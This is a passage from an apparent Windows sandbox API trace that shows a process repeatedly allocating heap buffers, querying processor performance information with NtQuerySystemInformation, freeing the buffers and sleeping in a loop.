ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0281.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0281.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0281.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0281.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0281.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.283] Sleep (dwMilliseconds=0x110) [0281.294] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0281.294] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.295] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0281.295] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0281.295] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0281.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0281.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.296] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0281.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0281.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0281.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.298] Sleep (dwMilliseconds=0x110) [0281.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0281.310] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0281.310] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0281.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.311] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0281.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0281.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0281.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0281.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0281.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.313] Sleep (dwMilliseconds=0x110) [0281.325] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0281.325] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0281.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0281.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.326] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0281.326] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0281.326] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0281.327] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0281.327] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.327] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0281.328] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.328] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.328] Sleep (dwMilliseconds=0x110) [0281.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0281.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.341] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0281.341] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0281.341] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0281.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0281.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.342] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0281.342] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0281.342] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0281.343] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.343] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.343] Sleep (dwMilliseconds=0x110) [0281.356] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0281.356] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0281.358] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0281.358] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.358] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0281.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0281.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.359] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0281.359] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0281.359] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.360] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0281.360] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.361] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.361] Sleep (dwMilliseconds=0x110) [0281.373] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0281.373] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.374] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0281.374] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0281.374] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.375] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0281.375] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0281.375] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.376] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0281.376] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0281.376] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0281.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.377] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.377] Sleep (dwMilliseconds=0x110) [0281.387] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0281.387] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.388] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0281.388] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0281.388] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.389] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0281.389] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0281.389] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.390] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0281.390] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0281.390] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.391] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0281.391] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.392] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.392] Sleep (dwMilliseconds=0x110) [0281.759] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0281.759] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.760] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0281.760] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0281.760] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.761] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0281.761] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0281.761] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.762] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0281.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0281.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0281.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.764] Sleep (dwMilliseconds=0x110) [0281.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0281.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0281.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0281.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0281.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0281.786] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.787] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0281.787] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0281.787] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.788] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0281.788] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.789] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.789] Sleep (dwMilliseconds=0x110) [0281.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0281.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0281.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0281.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0281.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0281.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0281.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0281.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0281.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.815] Sleep (dwMilliseconds=0x110) [0281.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0281.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.841] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0281.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0281.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0281.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0281.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0281.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0281.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0281.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.844] Sleep (dwMilliseconds=0x110) [0281.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0281.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0281.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0281.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0281.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0281.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0281.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0281.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0281.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.860] Sleep (dwMilliseconds=0x110) [0281.872] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0281.872] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.873] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0281.873] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0281.873] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.874] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0281.874] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0281.874] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.875] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0281.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0281.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0281.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0281.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0281.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0281.876] Sleep (dwMilliseconds=0x110) [0281.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0281.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0281.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0281.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, 